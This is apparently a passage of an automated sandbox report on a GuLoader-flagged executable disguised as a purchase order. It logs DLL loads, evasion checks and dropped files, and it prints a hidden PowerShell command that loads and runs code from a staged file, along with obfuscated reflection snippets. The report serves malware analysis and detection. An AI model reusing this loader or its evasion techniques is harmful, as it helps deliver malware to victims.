      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: PO. A-72 9234567.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314246777.000000001F9D7000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3316271260.000000001FB8F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Notanencephalia.exe, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314246777.000000001F9D7000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3316271260.000000001FB8F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.3112960418.0000000008A49000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.3097443257.0000000003079000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.3116482751.000000000AE52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Systematizers $Naboberies79 $Inventarkontis), (Advokatfuldmgtig @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Impofo = [AppDomain]::CurrentDomain.GetAsse
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hap)), $Justins140).DefineDynamicModule($Metwand, $false).DefineType($Bucerotidae, $Goodheartedness, [System.MulticastDelegate])$Meagr
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens)
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C9A5CF push eax; iretd 2_2_04C9A659
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C9E9F9 push eax; mov dword ptr [esp], edx2_2_04C9EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07B20FC4 push es; iretd 2_2_07B20FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0986058F push 8BD68B50h; retf 2_2_09860596
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD4135D push eax; iretd 14_2_1FD41369
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD709AD push ecx; mov dword ptr [esp], ecx14_2_1FD709B6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD4283D push eax; iretd 14_2_1FD42858
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD427FA pushad ; ret 14_2_1FD427F9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD4225F pushad ; ret 14_2_1FD427F9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeAPI/Special instruction interceptor: Address: 2FF5EAB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAFE20 rdtsc 14_2_1FDAFE20
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6351Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3250Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeAPI coverage: 0.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 8184Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe TID: 7732Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.3097443257.0000000003079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FngTask_v1.0.MSFT_NetEventVmNetworkAdatper.cdxml.
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.3099047054.000000000589E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.3099047054.000000000589E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.3099047054.000000000589E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: svchost.exe, 0000000B.00000002.3416138031.0000022D6EA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3417396280.0000022D74058000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3360324615.00000000040EC000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314745211.00000000040EC000.00000004.00000020.00020000.00000000.sdmp, Notanencephalia.exe, 0000000E.00000003.3314619689.00000000040EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.3097443257.0000000003079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmlT_
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeAPI call chain: ExitProcess graph end nodegraph_0-3714
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeAPI call chain: ExitProcess graph end nodegraph_0-3722
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAFE20 rdtsc 14_2_1FDAFE20
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C97801 LdrInitializeThunk,2_2_04C97801
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6BFD0 mov eax, dword ptr fs:[00000030h]14_2_1FD6BFD0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF3FD7 mov eax, dword ptr fs:[00000030h]14_2_1FDF3FD7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73FC2 mov eax, dword ptr fs:[00000030h]14_2_1FD73FC2
